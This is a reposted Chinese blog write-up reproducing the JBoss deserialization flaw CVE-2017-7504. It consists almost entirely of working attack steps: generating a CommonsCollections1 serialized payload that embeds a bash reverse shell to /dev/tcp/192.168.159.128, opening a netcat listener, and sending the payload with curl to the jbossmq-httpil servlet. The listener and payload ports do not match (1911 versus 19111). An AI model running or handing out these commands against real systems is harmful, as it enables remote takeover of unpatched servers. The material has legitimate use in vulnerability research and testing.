ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

jboss反序列化(cve-2017-7504)

2021-03-14 12:36:08  阅读:234  来源: 互联网

标签:7504 http ser 159.128 192.168 jboss 序列化 ExampleCommonsCollections1WithHashMap


 

 

影响范围

JBoss AS 4.x及之前版本

 

 

复现

编译生成序列化数据

 

序列化恶意数据

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.159.128/19111 0>&1"

 

kali开启本地监听

nc -lvvp 1911

将@ExampleCommonsCollections1WithHashMap.ser 发送到http://192.168.159.128:8080/jbossmq-httpil/HTTPServerILServlet

 


curl http://192.168.159.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

成功反弹

 

标签:7504,http,ser,159.128,192.168,jboss,序列化,ExampleCommonsCollections1WithHashMap
来源: https://www.cnblogs.com/zenb/p/14532057.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有